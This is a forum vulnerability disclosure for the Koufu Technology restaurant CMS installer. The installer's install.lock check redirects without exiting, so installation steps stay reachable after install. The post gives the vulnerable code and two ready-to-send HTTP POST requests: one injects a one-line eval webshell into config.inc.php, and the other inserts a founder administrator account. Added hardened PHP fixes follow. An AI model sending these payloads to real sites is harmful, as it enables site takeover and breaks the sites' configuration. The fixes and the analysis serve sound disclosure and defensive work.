中国网络渗透测试联盟 (China Network Penetration Testing Alliance)
Title: 口福科技 (Koufu Technology) restaurant CMS vulnerability (getshell possible)
Author: admin
Time: 2012-12-4 11:13
The problem is in the /install/index.php file. After installation finishes, an install.lock file is created in the program's root directory, but /install/index.php gets the check for install.lock wrong.

<?php
if(file_exists("../install.lock"))
{
    header("Location: ../"); // no exit
}

//echo 'tst';exit;
require_once("init.php");
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{

As you can see, when install.lock exists, header() only issues a 302 redirect and the script does not exit, so the logic below still executes. This gives rise to at least two vulnerabilities.
1. getshell (very dangerous)

if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{
    $smarty->assign("step",1);
    $smarty->display("index.html");
}elseif($_REQUEST['step']==2)
{
    $mysql_host=trim($_POST['mysql_host']);
    $mysql_user=trim($_POST['mysql_user']);
    $mysql_pwd=trim($_POST['mysql_pwd']);
    $mysql_db=trim($_POST['mysql_db']);
    $tblpre=trim($_POST['tblpre']);
    $domain==trim($_POST['domain']); // "==" as in the original source: a comparison, not an assignment
    $str="<?php \r\n";
    $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
    $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
    $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
    $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
    $str.='define("MYSQL_CHARSET","GBK");'."\r\n";
    $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
    $str.='define("DOMAIN","'.$domain.'");'."\r\n";
    $str.='define("SKINS","default");'."\r\n";
    $str.='?>';
    file_put_contents("../config/config.inc.php",$str); // writes the submitted data into a PHP file

The code above writes the POSTed data straight into ../config/config.inc.php, so submitting the following POST request yields a one-line webshell:
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.129/canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 126

mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD

However, this method is very dangerous: it will leave the site unable to run.
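The fix for both defects shown above, as an added example that is not the CMS's own code: the lock check terminates the script, and the config writer emits PHP literals through var_export() and whitelists the table prefix. The function names and the constructed $posted array are assumptions.

```php
<?php
// Added example, not the CMS's own code: a hardened version of the two
// defective spots quoted above from /install/index.php.

// 1. The lock check has to stop the script, not only send a redirect header.
function requireNotInstalled(string $lockFile): void
{
    if (file_exists($lockFile)) {
        header("Location: ../");
        exit; // without this, every step below still runs for the requester
    }
}

// 2. Emit config.inc.php from PHP literals instead of string concatenation.
//    var_export() quotes and escapes each value, so a submitted value such as
//    test");@eval($_POST[x]);?>//  ends up as an inert string constant.
function buildConfig(array $input): string
{
    // The table prefix is an SQL identifier, not free text: whitelist it.
    if (!preg_match('/^[A-Za-z0-9_]{1,32}$/', $input['tblpre'] ?? '')) {
        throw new InvalidArgumentException('invalid table prefix');
    }
    $constants = [
        'MYSQL_HOST'    => $input['mysql_host'] ?? '',
        'MYSQL_USER'    => $input['mysql_user'] ?? '',
        'MYSQL_PWD'     => $input['mysql_pwd'] ?? '',
        'MYSQL_DB'      => $input['mysql_db'] ?? '',
        'MYSQL_CHARSET' => 'GBK',
        'TABLE_PRE'     => $input['tblpre'],
        'DOMAIN'        => $input['domain'] ?? '',
        'SKINS'         => 'default',
    ];
    $out = "<?php\n";
    foreach ($constants as $name => $value) {
        $out .= 'define(' . var_export($name, true) . ', '
              . var_export(trim((string) $value), true) . ");\n";
    }
    return $out; // no closing ?> tag, so nothing can trail the PHP code
}

// Demonstration with the mysql_host value from the request in the post
// (constructed input array standing in for $_POST):
$posted = [
    'mysql_host' => 'test");@eval($_POST[x]);?>//',
    'mysql_user' => '1', 'mysql_pwd' => '2', 'mysql_db' => '3',
    'tblpre' => 'koufu_', 'domain' => 'www',
];
echo buildConfig($posted);
```

The MYSQL_HOST line that comes out is a single-quoted string literal, so the submitted value is stored as data and never executed.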
2. Adding an administrator directly

elseif($_REQUEST['step']==5)
{
    if($_POST)
    {
        require_once("../config/config.inc.php");
        $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
        mysql_select_db(MYSQL_DB,$link);
        mysql_query("SET NAMES ".MYSQL_CHARSET );
        mysql_query("SET sql_mode=''");

        $adminname=trim($_POST['adminname']);
        $pwd1=trim($_POST['pwd1']);
        $pwd2=trim($_POST['pwd2']);
        if(empty($adminname))
        {
            echo "<script>alert('管理员不能为空');history.go(-1);</script>";
            exit();
        }
        if(($pwd1!=$pwd2) or empty($pwd1))
        {
            echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>"; // no exit here either
        }
        mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)"); // an administrator can be inserted directly
    }

This way we can directly insert an administrator account qingshen/qingshen with the following request:
POST /canting/install/index.php?m=index&step=5 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.2cto.com/canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

adminname=qingshen&pwd1=qingshen&pwd2=qingshen
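A hardened step=5 handler, as an added example that is not the CMS's code. It assumes a PDO connection to the CMS database, a TABLE_PRE that has already been validated as an identifier, and the CMS's own umd5() helper (kept so stored hashes stay compatible with its login); the function name createFounderAdmin is an assumption, and it is meant to run behind a lock check that actually exits.

```php
<?php
// Added example, not the CMS's own code: a hardened step=5 handler.
// Assumptions: $db is a PDO connection, $tablePre is TABLE_PRE already
// validated as an identifier, and umd5() is the CMS's own password helper.
function createFounderAdmin(PDO $db, string $tablePre, array $post): bool
{
    $adminname = trim($post['adminname'] ?? '');
    $pwd1      = trim($post['pwd1'] ?? '');
    $pwd2      = trim($post['pwd2'] ?? '');

    // Every validation failure ends the request. In the quoted code only the
    // empty-name case exits; the password mismatch prints an alert and then
    // falls through to the INSERT anyway.
    if ($adminname === '') {
        echo "<script>alert('admin name cannot be empty');history.go(-1);</script>";
        return false;
    }
    if ($pwd1 === '' || $pwd1 !== $pwd2) {
        echo "<script>alert('the two passwords do not match');history.go(-1);</script>";
        return false;
    }

    // Refuse to run the step twice: if a founder account already exists the
    // installer must not add another, independently of the install.lock check.
    $count = (int) $db->query("SELECT COUNT(*) FROM {$tablePre}admin WHERE isfounder=1")
                      ->fetchColumn();
    if ($count > 0) {
        return false;
    }

    // Bind the submitted values rather than splicing them into the SQL text.
    $stmt = $db->prepare(
        "INSERT INTO {$tablePre}admin (adminname, password, isfounder) VALUES (?, ?, 1)"
    );
    return $stmt->execute([$adminname, umd5($pwd1)]);
}
```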